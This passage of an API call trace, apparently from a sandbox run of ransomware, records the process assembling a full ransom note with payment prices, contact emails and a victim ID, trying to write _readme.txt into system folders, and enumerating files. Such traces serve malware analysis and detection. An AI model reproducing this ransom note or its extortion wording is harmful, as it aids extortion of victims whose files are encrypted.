can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.835] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.835] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.836] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.836] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.836] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.836] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.836] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.836] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 